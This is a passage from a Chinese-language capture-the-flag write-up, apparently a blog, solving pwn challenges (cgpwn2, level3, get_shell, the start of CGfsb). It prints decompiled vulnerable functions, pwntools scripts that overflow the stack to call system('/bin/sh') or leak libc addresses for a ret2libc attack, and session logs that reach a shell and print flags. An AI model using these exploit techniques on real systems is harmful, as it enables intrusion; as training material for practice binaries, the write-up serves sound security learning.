you<\/code><\/pre>\n<p>\u6253\u5f00IDA\u67e5\u770b\u4e00\u4e0b<code>main\u51fd\u6570<\/code>\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  hello();\n  puts(&quot;thank you&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>\u518d\u770b\u4e00\u4e0b<code>hello()\u51fd\u6570<\/code>:<\/p>\n<pre><code class=\"language-c\">char *hello()\n{\n  char *v0; \/\/ eax\n  signed int v1; \/\/ ebx\n  unsigned int v2; \/\/ ecx\n  char *v3; \/\/ eax\n  char s; \/\/ [esp+12h] 
[ebp-26h]\n  int v6; \/\/ [esp+14h] [ebp-24h]\n\n  v0 = &amp;s;\n  v1 = 30;\n  if ( (unsigned int)&amp;s &amp; 2 )\n  {\n    *(_WORD *)&amp;s = 0;\n    v0 = (char *)&amp;v6;\n    v1 = 28;\n  }\n  v2 = 0;\n  do\n  {\n    *(_DWORD *)&amp;v0[v2] = 0;\n    v2 += 4;\n  }\n  while ( v2 &lt; (v1 &amp; 0xFFFFFFFC) );\n  v3 = &amp;v0[v2];\n  if ( v1 &amp; 2 )\n  {\n    *(_WORD *)v3 = 0;\n    v3 += 2;\n  }\n  if ( v1 &amp; 1 )\n    *v3 = 0;\n  puts(&quot;please tell me your name&quot;);\n  fgets(name, 50, stdin);\n  puts(&quot;hello,you can leave some message here:&quot;);\n  return gets(&amp;s);\n}<\/code><\/pre>\n<p>\u6211\u4eec\u8fd8\u5728\u5176\u4ed6\u51fd\u6570\u91cc\u627e\u5230\u4e86system\uff0c\u4f46\u662f\u6ca1\u6709\u4ec0\u4e48\u6709\u4ef7\u503c\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-c\">int pwn()\n{\n  return system(&quot;echo hehehe&quot;);\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u7b2c\u4e00\u4e2a\u8f93\u5165\u70b9\u6709\u4e00\u4e2aname\uff0c\u70b9\u51fb\u8ddf\u8fdb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018241.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018241.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217232120029\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<ul>\n<li>name\u5728bss\u6bb5\u4e2d\uff0c\u5730\u5740\u56fa\u5b9a\u4e0d\u53d8<\/li>\n<li>\u53ef\u4ee5\u5229\u7528fgets\u51fd\u6570\u5411\u5176\u4e2d\u5199\u4e1c\u897f<\/li>\n<li>\u7a0b\u5e8f\u4e2d\u8c03\u7528\u4e86system\u51fd\u6570\uff0c\u4f46\u662f\u6ca1\u6709\/bin\/sh<\/li>\n<\/ul>\n<p>\u53ef\u4ee5\u901a\u8fc7\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8c03\u7528system\u51fd\u6570\uff0c\u5411name\u4e2d\u5199\u5165<code>\/bin\/sh<\/code>\uff0c\u628a\u53c2\u6570\u5730\u5740\u8bbe\u7f6e\u4e3aname\u7684\u9996\u5730\u5740\u3002<\/p>\n<pre><code class=\"language-python\">#exp.py\n#!usr\/bin\/python\nfrom pwn import *\nio = remote(&quot;111.200.241.244&quot;,63685)\ncontext.log_level = &#039;debug&#039;\nio.recvuntil(&quot;your name&quot;)\nio.sendline(&quot;\/bin\/sh&quot;)\nio.recvuntil(&quot;leave some message here:&quot;)\npayload  = &quot;a&quot; * 0x26 + &quot;aaaa&quot; + p32(0x08048420).decode(&#039;unicode_escape&#039;) + &quot;aaaa&quot; + p32(0x0804A080).decode(&#039;unicode_escape&#039;)\nio.sendline(payload)\nio.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u5373\u53ef\u5f97\u5230flag\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 63685: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;your name&quot;)\n[DEBUG] Received 0x18 bytes:\n    b&#039;please tell me your name&#039;\nexp.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(&quot;\/bin\/sh&quot;)\n[DEBUG] Sent 0x8 bytes:\n    b&#039;\/bin\/sh\\n&#039;\nexp.py:8: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. 
See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;leave some message here:&quot;)\n[DEBUG] Received 0x1 bytes:\n    b&#039;\\n&#039;\n[DEBUG] Received 0x27 bytes:\n    b&#039;hello,you can leave some message here:\\n&#039;\nexp.py:10: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\n[DEBUG] Sent 0x37 bytes:\n    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  \u2502aaaa\u2502aaaa\u2502aaaa\u2502aaaa\u2502\n    *\n    00000020  61 61 61 61  61 61 61 61  61 61 20 84  04 08 61 61  \u2502aaaa\u2502aaaa\u2502aa \u00b7\u2502\u00b7\u00b7aa\u2502\n    00000030  61 61 80 a0  04 08 0a                               \u2502aa\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u2502\n    00000037\n[*] Switching to interactive mode\n\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b&#039;ls\\n&#039;\n[DEBUG] Received 0x24 bytes:\n    b&#039;bin\\n&#039;\n    b&#039;cgpwn2\\n&#039;\n    b&#039;dev\\n&#039;\n    b&#039;flag\\n&#039;\n    b&#039;lib\\n&#039;\n    b&#039;lib32\\n&#039;\n    b&#039;lib64\\n&#039;\nbin\ncgpwn2\ndev\nflag\nlib\nlib32\nlib64\n$ cat flag\n[DEBUG] Sent 0x9 bytes:\n    b&#039;cat flag\\n&#039;\n[DEBUG] Received 0x2d bytes:\n    b&#039;cyberpeace{78b0c6c2bad0d97333324124764d0dd0}\\n&#039;\ncyberpeace{78b0c6c2bad0d97333324124764d0dd0}<\/code><\/pre>\n<h2>level3<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018242.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018242.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218124757725\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u9898\u76ee\u9644\u4ef6\u6253\u5f00\u662f\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u538b\u7f29\u5305\u89e3\u538b\u7f29\u4ee5\u540e\u5728 windows \u663e\u793a\u6b63\u5e38\u662f\u6587\u6863\uff0c\u4f46\u5728linux\u663e\u793a\u8fd8\u662f\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u4e14\u63d0\u53d6\u89e3\u538b\u4f1a\u4ea7\u751f\u9519\u8bef\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018243.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018243.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218131150588\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fdc\u7a0b\u8fde\u63a5\u4e00\u4e0b\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ nc 111.200.241.244 52403\nInput:\n123456789    \nHello, World!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e86\u5f88\u957f\u65f6\u95f4\uff0c\u7ec8\u4e8e\u6210\u529f\uff01\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018244.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018244.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218212541039\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">[*] &#039;\/home\/kali\/Desktop\/level3&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\n[*] &#039;\/home\/kali\/Desktop\/libc_32.so.6&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/code><\/pre>\n<p>\u7528IDA\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b string\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018245.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018245.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218222726696\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u518d\u67e5\u770b\u4e00\u4e0b\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">#level3\u7684main\u51fd\u6570\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  vulnerable_function();\n  write(1, &quot;Hello, World!\\n&quot;, 0xEu);\n  return 0;\n}<\/code><\/pre>\n<pre><code class=\"language-c\">#vulnerable_function()\u51fd\u6570\nssize_t vulnerable_function()\n{\n  char buf; \/\/ [esp+0h] [ebp-88h]\n\n  write(1, &quot;Input:\\n&quot;, 7u);\n  return read(0, &amp;buf, 0x100u);\n}<\/code><\/pre>\n<p>\u8fd9\u9898\u6211\u53ea\u770b\u51fa<code>buf<\/code>\u5728<code>read\u51fd\u6570<\/code>\u4e2d\u8fdb\u884c\u4e86\u8c03\u7528\u3002\u53ef\u4ee5\u8fdb\u884c\u6ea2\u51fa\u3002\u5269\u4e0b\u7684\u53c2\u8003\u7684\u662f\u4e24\u4f4d\u5e08\u5085\u5199\u7684wp:<\/p>\n<blockquote>\n<p><code>\u653b\u51fb\u601d\u8def\uff1a libc\u4e2d\u7684\u51fd\u6570\u7684\u76f8\u5bf9\u5730\u5740\u662f\u56fa\u5b9a\u7684\uff0c\u8981\u60f3\u83b7\u53d6\u5230system\u51fd\u6570\u7684\u5730\u5740\uff0c\u53ef\u4ee5\u901a\u8fc7write()\u51fd\u6570\u8fdb\u884coffset\u8ba1\u7b97\u3002<\/code><\/p>\n<p><code>1. \u9996\u5148\u5229\u7528write()\u51fd\u6570\u8ba1\u7b97\u51fawrite()\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1b<\/code><\/p>\n<p><code>2. 
\u5229\u7528\u76f8\u5bf9offset\u8ba1\u7b97\u51fasystem\u548c&quot;\/bin\/sh&quot;\u7684\u771f\u5b9e\u5730\u5740\u3002<\/code><br \/>\n\u5728vulnerable_function()\u4e2d\uff0c\u5148\u8c03\u7528\u4e86write()\u51fd\u6570\uff0c\u7136\u540e\u8c03\u7528read()\u51fd\u6570\u3002write()\u51fd\u6570\u8fd4\u56de\u5230vulnerable_function()\u540e\uff0c\u518d\u8fdb\u884cread()\u51fd\u6570\u8c03\u7528\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u8fdb\u884c\u4e8c\u6b21\u653b\u51fb\u3002<\/p>\n<ul>\n<li>\u7b2c\u4e00\u6b21\u653b\u51fb\u6211\u4eec\u5229\u7528\u6808\u6ea2\u51fa\u5c06write()\u51fd\u6570\u5728got\u8868\u4e2d\u7684\u771f\u5b9e\u5730\u5740leak\u51fa\u6765\uff0c\u7136\u540e\u51cf\u53bblibc\u4e2d\u7684offset\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230libc\u7684base address\u3002<\/li>\n<li>\u7b2c\u4e8c\u6b21\u653b\u51fb\u91cd\u65b0\u8fdb\u5165main\u51fd\u6570\uff0c\u518d\u6b21\u901a\u8fc7\u6808\u6ea2\u51fa\uff0c\u5229\u7528system\u51fd\u6570\u8fdb\u884cgetshell\u3002`                                                                                                                                                                                                                              \u2014\u2014<a 
href=\"https:\/\/blog.csdn.net\/elsa________\">elsa<strong>____<\/strong><\/a><\/li>\n<\/ul>\n<p><code>\u8fd9\u91cc\u901a\u8fc7\u7a0b\u5e8f\u52a0\u8f7d\u7684libc\u91cc\u9762\u5e93\u51fd\u6570system\u548c\/bin\/sh\u5b57\u7b26\u4e32\u6765\u8fbe\u5230\u6211\u4eec\u7684\u76ee\u7684\uff0c\u7a0b\u5e8f\u5f00\u59cb\u8fd0\u884c\u7684\u65f6\u5019\uff0c\u4f1a\u628a\u6574\u4e2alibc\u6620\u5c04\u5230\u5185\u5b58\u7a7a\u95f4\uff0c\u540e\u9762\u7a0b\u5e8f\u8c03\u7528\u76f8\u5173\u5e93\u51fd\u6570\u7684\u65f6\u5019\uff0c\u4f1a\u4f9d\u7167plt-got\u8868\u7684\u673a\u5236\uff0c\u5c06\u6240\u9700\u7684\u5e93\u51fd\u6570\u52a0\u8f7d\u5230\u5185\u5b58\u7a7a\u95f4\u7684\u67d0\u4e2a\u865a\u62df\u5185\u5b58\u5730\u5740\uff0c\u7136\u540e\u8c03\u7528\u5c31\u4f1a\u901a\u8fc7plt-got\u8868\u8df3\u8f6c\u5230\u771f\u6b63\u7684\u51fd\u6570\u5185\u5b58\u5730\u5740\u5904\u5b8c\u6210\u529f\u80fd\u3002\u901a\u8fc7write\u51fd\u6570\u6cc4\u9732write\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u7136\u540e\u901a\u8fc7write\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u8ba1\u7b97\u51fasystem\u51fd\u6570\u548c&quot;\/bin\/sh&quot;\u7684\u771f\u5b9e\u5730\u5740\uff0c\u7136\u540e\u8df3\u8f6c\u8fc7\u53bb\u6267\u884c\u3002\u8fd9\u5c31\u9700\u8981\u4e24\u6b21\u6ea2\u51fa\u3002<\/code><\/p>\n<p>\u200b                                                                                                                                                                                      \u2014\u2014endust<\/p>\n<\/blockquote>\n<p>\u6700\u540e\u5c31\u662f\u5199exp\uff0c\u672c\u9898exp\u7528\u7684\u662f<a href=\"https:\/\/blog.csdn.net\/elsa________\">elsa<strong>____<\/strong><\/a>\u5e08\u5085\u7684\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\nsh = remote(&quot;111.200.241.244&quot;,&quot;52403&quot;)\n#sh=process(&#039;.\/level3&#039;)\n#context.log_level = &#039;debug&#039;\nelf=ELF(&#039;.\/level3&#039;)\nlibc=ELF(&#039;.\/libc_32.so.6&#039;)\n#get func address\nwrite_plt = 
elf.plt[&#039;write&#039;]\nwrite_got = elf.got[&#039;write&#039;]\nmain_addr = elf.symbols[&#039;main&#039;]\npayload = b&#039;A&#039;*0x88 + p32(0xdeadbeef) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(0xdeadbeef)\nsh.sendlineafter(&quot;Input:\\n&quot;,payload)\n#leak write&#039;s addr in got\nwrite_got_addr = u32(sh.recv()[:4])\n#leak libc&#039;s addr\nlibc_addr = write_got_addr - libc.symbols[&#039;write&#039;]\n#get system&#039;s addr\nsys_addr = libc_addr + libc.symbols[&#039;system&#039;]\n#get bin\/sh &#039;s addr    strings -a -t x libc_32.so.6 | grep &quot;\/bin\/sh&quot;\n#libc.search(&quot;\/bin\/sh&quot;).next()\nbin_sh_addr = libc_addr + 0x15902b\n#get second payload\npayload0 = b&#039;A&#039;*0x88 + p32(0xdeadbeef) + p32(sys_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)\nsh.sendline(payload0)\nsh.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u5373\u53ef\u5f97\u5230flag:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018246.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018246.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218222302115\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>==PS\uff1a\u8fd9\u91cc\u53ef\u80fd\u4f1a\u6709\u62a5\u9519\uff1a==<\/p>\n<blockquote><p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018247.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018247.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218224255709\" style=\"zoom: 50%;\" \/><\/div>\n<\/p><\/blockquote>\n<p>==\u89e3\u51b3\u529e\u6cd5\uff1a==<\/p>\n<blockquote>\n<p>\u5728<code>&#039;A&#039;<\/code>\u53ca\u5176\u4ed6\u5b57\u6bcd\u524d\u9762\u52a0\u4e0ab\uff0c\u56e0\u4e3apayload\u5728\u53d1\u9001\u5b57\u7b26\u524d\u9700\u8981\u52a0\u4e0a\u4e00\u4e2ab\u3002<\/p>\n<\/blockquote>\n<h2>get_shell<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018248.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218150828449\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff<code>64\u4f4dIDA<\/code>\u6253\u5f00\uff0c\u89c2\u5bdfmain\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  puts(&quot;OK,this time we will get a shell.&quot;);\n  system(&quot;\/bin\/sh&quot;);\n  return 
0;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u8fd0\u884c\u5c31\u80fd\u62ff\u5230shell\uff1a<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *   #\u5bfc\u5165 pwntools \u4e2d pwn \u5305\u7684\u6240\u6709\u5185\u5bb9\nr = remote(&quot;111.200.241.244&quot;,&quot;56877&quot;)  # \u94fe\u63a5\u670d\u52a1\u5668\u8fdc\u7a0b\u4ea4\u4e92\nr.sendline()  # \u5c06shellcode \u53d1\u9001\u5230\u8fdc\u7a0b\u8fde\u63a5\nr.interactive()  # \u5c06\u63a7\u5236\u6743\u4ea4\u7ed9\u7528\u6237\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\u6253\u5f00\u7684shell\u4e86<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py          \n[+] Opening connection to 111.200.241.244 on port 56877: Done\n[*] Switching to interactive mode\n$ cat flag\ncyberpeace{27c56f65c3888d1dfd6d8293db7966ab}<\/code><\/pre>\n<h2>CGfsb<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018249.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018249.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218154911015\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u9644\u4ef6\u7684\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec CGfsb\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/CGfsb&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    Canary 
found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ file CGfsb \nCGfsb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=113a10b953bc39c6e182c4ce6e05582ba2f8017a, not stripped                                                         \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ checksec --file=e41a0f684d0e497f87bb309f91737e4d \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH   Symbols         FORTIFY Fortified       Fortifiable     FILE\nPartial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   77) Symbols    No    0               3               e41a0f684d0e497f87bb309f91737e4d\n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ .\/CGfsb            \nzsh: permission denied: .\/CGfsb                                                                            \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ chmod -R 777 CGfsb                                                                               \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ .\/CGfsb           \nplease tell me your name:\naaa\nleave your message please:\naaa\nhello aaa\nyour message is:\naaa\nThank you!<\/code><\/pre>\n<p>\u8fd9\u91cc\u6ce8\u610f ubuntu \u548c kali \u4f7f\u7528\u7684 checksec \u7248\u672c\u4e0d\u4e00\u6837\uff0c\u4f7f\u7528\u65b9\u6cd5\u4e5f\u4e0d\u4e00\u6837\uff0c\u8be6\u60c5\u53ef\u4ee5\u53c2\u8003<a href=\"https:\/\/github.com\/slimm609\/checksec.sh\">\u5b98\u65b9\u6587\u6863<\/a><\/p>\n<p>\u6253\u5f00IDA\uff0c\u67e5\u770bmain\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int buf; \/\/ [esp+1Eh] [ebp-7Eh]\n  int v5; \/\/ [esp+22h] [ebp-7Ah]\n  
